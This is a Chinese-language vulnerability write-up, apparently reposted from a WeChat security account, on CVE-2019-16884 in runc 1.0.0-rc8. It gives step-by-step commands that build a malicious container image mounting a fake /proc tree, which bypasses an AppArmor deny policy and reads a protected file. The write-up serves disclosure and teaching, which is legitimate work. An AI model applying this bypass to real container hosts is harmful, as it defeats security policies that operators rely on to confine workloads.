影响范围
runc 1.0.0-rc8
漏洞类型
容器逃逸漏洞
利用条件
影响范围应用
漏洞概述
在Docker 19.03. 2-ce和其他产品中使用的runc 1.0.0-rc8允许绕过AppArmor限制,因为libcontainer/rootfs_linux.go错误地检查装载目标,攻击者可以在容器镜像中可以声明一个VOLUME并挂载至/proc,之后欺骗runc使其认为AppArmor已经成功应用从而绕过AppArmor策略,该漏洞由Adam Iwaniuk发现并在DragonSector CTF 2019期间披露,这个CTF题目挑战将一个文件挂载到/flag-<random>,并使用AppArmor策略拒绝访问该文件,选手可以利用这个漏洞来禁用这个策略并读取文件
漏洞环境
构建实验环境:
docker run -it ssst0n3/docker_archive:CVE-2019-16884ubuntu login: rootPassword: root
漏洞复现
Step 1:创建apparmor规则
cat > /etc/apparmor.d/no_flag <<EOF#include <tunables/global>profile no_flag flags=(attach_disconnected,mediate_deleted) {#include <abstractions/base>file,deny /flag r,}EOF
Step 2:创建一个flag文件
echo "Al1ex is comming" > /tmp/flag
Step 3:应用规则
/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag
Step 4:启动一个正常镜像此时无权限读取/flag内容
docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag busybox cat /flagcat: can't open '/flag': Permission denied
Step 4:利用漏洞启用一个恶意镜像,可以读取/flag
mkdir -p rootfs/proc/self/{attr,fd}touch rootfs/proc/self/{status,attr/exec}touch rootfs/proc/self/fd/{4,5}cat <<EOF > DockerfileFROM busyboxADD rootfs /VOLUME /procEOFdocker build -t apparmor-bypass .docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag apparmor-bypass cat /flagAl1ex is comming!!!docker: Error response from daemon: cannot start a stopped process: unknown.
安全建议
升级到最新版本
原文始发于微信公众号(七芒星实验室):Apparmor Restriction Bypass
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论